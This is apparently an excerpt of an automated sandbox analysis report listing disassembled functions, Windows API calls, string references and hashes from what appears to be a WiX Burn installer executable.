                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                          • Opcode ID: bfee98ce278b4fade3776f4b17b90bd041e506e2ef25feb867d10d23fe57a4b7
                                                                                                                                                          • Instruction ID: d5a70d18d1ac26a7acd488a6148637f93a27638513b298cb8d2d56c19bffa989
                                                                                                                                                          • Opcode Fuzzy Hash: bfee98ce278b4fade3776f4b17b90bd041e506e2ef25feb867d10d23fe57a4b7
                                                                                                                                                          • Instruction Fuzzy Hash: 7D31D474901219ABCB21DF24DC8978DBBB4BF08315F5041EAE80DA7261EB749B85CF48
                                                                                                                                                          Function 00466447 Relevance: 3.1, APIs: 2, Instructions: 57memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004664D7: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,00466476,?), ref: 004665A3
                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0046649A
                                                                                                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004664AB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2114926846-0
                                                                                                                                                          • Opcode ID: 7c5e70ac89f8279d19b4ea57bb97024ee04c92d05292529b26c226a846023772
                                                                                                                                                          • Instruction ID: 91b0d2218531f0bdff2c4608e3d3d7f2afbc730aff237ce36eff0ddd7732ce50
                                                                                                                                                          • Opcode Fuzzy Hash: 7c5e70ac89f8279d19b4ea57bb97024ee04c92d05292529b26c226a846023772
                                                                                                                                                          • Instruction Fuzzy Hash: 1E1152B190421AABDB10DFE5CC85BAFB7F8FF08304F51443EA545A6241E778AA44CB59
                                                                                                                                                          Function 004575EC Relevance: 2.9, Strings: 2, Instructions: 385COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: *^E$0
                                                                                                                                                          • API String ID: 0-3353421320
                                                                                                                                                          • Opcode ID: bd84e55d9ef50d17c8306941367f9be0a70a3231ed31b14a85680195c2359b3e
                                                                                                                                                          • Instruction ID: 19dd0bf610b369ad09aaf5c7f3386a467d958f9471c5bfb13bb32f512fe8664f
                                                                                                                                                          • Opcode Fuzzy Hash: bd84e55d9ef50d17c8306941367f9be0a70a3231ed31b14a85680195c2359b3e
                                                                                                                                                          • Instruction Fuzzy Hash: 4DD1F2746086068FCB24DF28E484A6FB7B1FF48326B14462FDC569B352C338AD49CB59
                                                                                                                                                          Function 004073CD Relevance: 2.5, APIs: 2, Instructions: 13memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: dc5536ddb000377aa9e94b7a9e169a71fd4ab634e226eb3607ab556d326adc3c
                                                                                                                                                          • Instruction ID: f7f45192f8c66b68b58001092a6343ac8a981d9ab92abbee0e69d81dd101adc6
                                                                                                                                                          • Opcode Fuzzy Hash: dc5536ddb000377aa9e94b7a9e169a71fd4ab634e226eb3607ab556d326adc3c
                                                                                                                                                          • Instruction Fuzzy Hash: 01C012321A4208A78B006FF4EC09C55379CB7187027448410B519C2011C638E0508764
                                                                                                                                                          Function 004641A8 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004641A3,?,?,00000008,?,?,00463DA6,00000000), ref: 004643D5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                          • Opcode ID: 1068c4a5e8aac8031e846d6643bd5c2f296e043d18ab94b0131aec5ed4f2c2ba
                                                                                                                                                          • Instruction ID: 79bc70ab094d8993b9a97d0b2f177e81505f375f8c8a262a24e0f2664524a6e6
                                                                                                                                                          • Opcode Fuzzy Hash: 1068c4a5e8aac8031e846d6643bd5c2f296e043d18ab94b0131aec5ed4f2c2ba
                                                                                                                                                          • Instruction Fuzzy Hash: 7FB18F31210608CFDB15CF28C48AB657BE0FF85364F258699E899CF3A1D739E992CB45
                                                                                                                                                          Function 00452045 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0045205B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                          • Opcode ID: 835dd7d25bb45ffce50be2cb4b4cabc4ff5c22bcd4aaa1898e262291104f7f75
                                                                                                                                                          • Instruction ID: 8da82a035473f400a5994de2729d50ac7b116ba93166cc40ef21c72184e46cd7
                                                                                                                                                          • Opcode Fuzzy Hash: 835dd7d25bb45ffce50be2cb4b4cabc4ff5c22bcd4aaa1898e262291104f7f75
                                                                                                                                                          • Instruction Fuzzy Hash: 9A51AA71A016198FEB14CF58DA927ABB7F4FB49341F60826BD805EB361C3B8AD44CB54
                                                                                                                                                          Function 0045C110 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2731048e8c2a39c7a7d2d84096d8d3a08f575b6bec4fac31138f409b90b5fc07
                                                                                                                                                          • Instruction ID: b68c0ce26639dc9d8cf2ad18e58dd1228a41a2a0341f7ec316fcdeb91082e522
                                                                                                                                                          • Opcode Fuzzy Hash: 2731048e8c2a39c7a7d2d84096d8d3a08f575b6bec4fac31138f409b90b5fc07
                                                                                                                                                          • Instruction Fuzzy Hash: FE312576900318AFCB20DFB9CCC9DABB77DEB84355F14419AFC0593246EA349E448B98
                                                                                                                                                          Function 00448749 Relevance: 1.5, Strings: 1, Instructions: 288COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: feclient.dll
                                                                                                                                                          • API String ID: 0-3074931424
                                                                                                                                                          • Opcode ID: 4543d31d7fc58b467c7297ffed56ed7b6735cd803fd26b10a97daade013cc869
                                                                                                                                                          • Instruction ID: e857643570bd46922b9f76f942c8c1741d47a12c9394031174989f4d648d5d36
                                                                                                                                                          • Opcode Fuzzy Hash: 4543d31d7fc58b467c7297ffed56ed7b6735cd803fd26b10a97daade013cc869
                                                                                                                                                          • Instruction Fuzzy Hash: F6B15F71A00B01ABEB24EF76C985B9FB7E5BF44304F15482EE466A7641DB38F850CB58
                                                                                                                                                          Function 004440C6 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f45917a54f30991107f6fb82b6191d13c0f43520db1c78e611fe930a6d6763fd
                                                                                                                                                          • Instruction ID: b90d49f35a4b591f4343fdb12ddf7357342be5dfb6db75ee049a7f173ee5fcd9
                                                                                                                                                          • Opcode Fuzzy Hash: f45917a54f30991107f6fb82b6191d13c0f43520db1c78e611fe930a6d6763fd
                                                                                                                                                          • Instruction Fuzzy Hash: E541E172694600AAFB2D8D3D896D7773691FBE2315F24812FC553C6798D938D9C2CA0C
                                                                                                                                                          Function 004C9CC0 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
                                                                                                                                                          • Instruction ID: be7eecee3400b42b3e558a840de4aeb97e4223185f45bdd8b65d759b642826a8
                                                                                                                                                          • Opcode Fuzzy Hash: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
                                                                                                                                                          • Instruction Fuzzy Hash: 85A002321A5B8CC7C612A68DA651B51B3ECE348D54F440461A50D43E015659B9108495
                                                                                                                                                          Function 00473BCF Relevance: 81.0, APIs: 11, Strings: 35, Instructions: 471COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,004A39F8,000000FF,?,?,?), ref: 00473CE8
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 00473D2A
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 00473D6F
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 00473DB4
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 00473DF9
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00473E3E
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 00473E7B
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 00473EB8
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,link,000000FF), ref: 00473F12
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00473F5C
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0047410E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$Compare$Free
                                                                                                                                                          • String ID: Cannot have two content elements in ATOM entry.$Failed to allocate ATOM entry authors.$Failed to allocate ATOM entry categories.$Failed to allocate ATOM entry content.$Failed to allocate ATOM entry id.$Failed to allocate ATOM entry links.$Failed to allocate ATOM entry published.$Failed to allocate ATOM entry summary.$Failed to allocate ATOM entry title.$Failed to allocate ATOM entry updated.$Failed to find required feed/entry/id element.$Failed to find required feed/entry/title element.$Failed to find required feed/entry/updated element.$Failed to get child nodes of ATOM entry element.$Failed to parse ATOM entry author.$Failed to parse ATOM entry category.$Failed to parse ATOM entry content.$Failed to parse ATOM entry link.$Failed to parse unknown ATOM entry element: %ls$Failed to process all ATOM entry elements.$author$cabinet.dll$category$clbcatq.dll$content$crypt32.dll$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                          • API String ID: 318886736-1489739114
                                                                                                                                                          • Opcode ID: 773200d8780b6702192a217ca311c0702c44fc95bf92fc1a2c67c6e4f4cdd218
                                                                                                                                                          • Instruction ID: 2b27df84a53cea7d47ff0ed95abe9a08550182da29971cf9c314861f22321a48
                                                                                                                                                          • Opcode Fuzzy Hash: 773200d8780b6702192a217ca311c0702c44fc95bf92fc1a2c67c6e4f4cdd218
                                                                                                                                                          • Instruction Fuzzy Hash: 32E14632A84201BBDB118F44CC86FEB3675DB95B21F314157F719BA2D1DBB89A00975C
                                                                                                                                                          Function 00475563 Relevance: 66.9, APIs: 9, Strings: 29, Instructions: 385COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,?,00000000,00000000), ref: 0047558E
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 004755AD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to allocate application identity.$Failed to allocate application summary.$Failed to allocate application title.$Failed to allocate application type.$Failed to allocate content type.$Failed to allocate content.$Failed to allocate enclosures for application update entry.$Failed to allocate upgrade id.$Failed to compare version to upgrade version.$Failed to parse enclosure.$Failed to parse upgrade version string '%ls' from ATOM entry.$Failed to parse version string '%ls' from ATOM entry.$Upgrade version is greater than or equal to application version.$application$clbcatq.dll$comres.dll$crypt32.dll$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$msasn1.dll$msi.dll$true$type$upgrade$version$version.dll$wininet.dll
                                                                                                                                                          • API String ID: 1825529933-2598801156
                                                                                                                                                          • Opcode ID: e063ab912261604ee7b1aba1f3b081e22ab5e0c4fe888a66a1e1a7f2e66459a6
                                                                                                                                                          • Instruction ID: 5ec1de30ea460261d36b6dbcd4e436a8e69d595fbc0d0ba17edba3412f463226
                                                                                                                                                          • Opcode Fuzzy Hash: e063ab912261604ee7b1aba1f3b081e22ab5e0c4fe888a66a1e1a7f2e66459a6
                                                                                                                                                          • Instruction Fuzzy Hash: 4FD12871A84B01FBDB219A04CC46F9637A5AB55B20F718217F62DBF2D1D6F8E940CB09
                                                                                                                                                          Function 0040D192 Relevance: 65.2, APIs: 6, Strings: 31, Instructions: 490COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,0040955C,0040959C,?,00422D30,0040951C,?,0040951C,?,0040951C,?,?,?,0040955C), ref: 0040D1C2
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?,00422D30,0040951C,?,0040951C,?,0040951C,?,?,?,0040955C), ref: 0040D737
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: Attempt to add built-in variable: %ls$Attempt to add variable again: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant value.$Hidden$Initializing formatted variable '%ls' to value '%ls'$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$d:\a\wix\wix\src\burn\engine\variable.cpp$formatted$numeric$string$version
                                                                                                                                                          • API String ID: 3168844106-236387454
                                                                                                                                                          • Opcode ID: 15628b976cd43af0f06e45f92c9bc0e7ad15dfa85267ad2ef46b93266d67e4d7
                                                                                                                                                          • Instruction ID: 4abdce43269bce2ba97f53a6e37c419888a6064a9d797e4105a60e017dfa868a
                                                                                                                                                          • Opcode Fuzzy Hash: 15628b976cd43af0f06e45f92c9bc0e7ad15dfa85267ad2ef46b93266d67e4d7
                                                                                                                                                          • Instruction Fuzzy Hash: 77F1F631E40218BBDB119A948C06FEF7735EB48B14F20417BFA087B2D1D7B95A449B9D
                                                                                                                                                          Function 0047475F Relevance: 56.3, APIs: 8, Strings: 24, Instructions: 334COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,rel,00000000,?,?,?,00000000), ref: 004747E3
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474ABC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
